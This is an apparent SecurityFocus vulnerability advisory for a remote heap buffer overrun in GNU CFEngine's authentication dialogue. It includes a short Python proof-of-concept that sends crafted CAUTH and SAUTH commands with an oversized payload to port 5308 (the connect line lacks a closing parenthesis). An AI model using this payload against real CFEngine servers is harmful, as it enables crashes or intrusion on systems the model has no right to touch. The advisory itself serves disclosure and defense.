GNU CFEngine AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability

An exploit was developed by the discoverers of this vulnerability. This exploit is not believed to be public. The following proof of concept is available:

import struct
import socket
import time

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.1',5308)

# CAUTH command
p = 'k' # status
p += '0000023' # len
p += 'CAUTH ' # command
p += 'HARE KRISHNA HARE'
print 'sending CAUTH command...'
s.send(p)
# SAUTH command
p = 'k' # status
p += '0003000' # len
p += 'SAUTH ' # command
p += 'n' # iscrypt
p += '00000010 ' # crypt_len
p += '00001000' # nonce_len
p += 'X' * 3000
print 'sending SAUTH command...'
s.send(p)

a = s.recv(4096)
print a

Exploit code cfengine_hof.c has been supplied by jsk exworm <exworm.hostrocket.com>.


 

Privacy Statement
Copyright 2010, SecurityFocus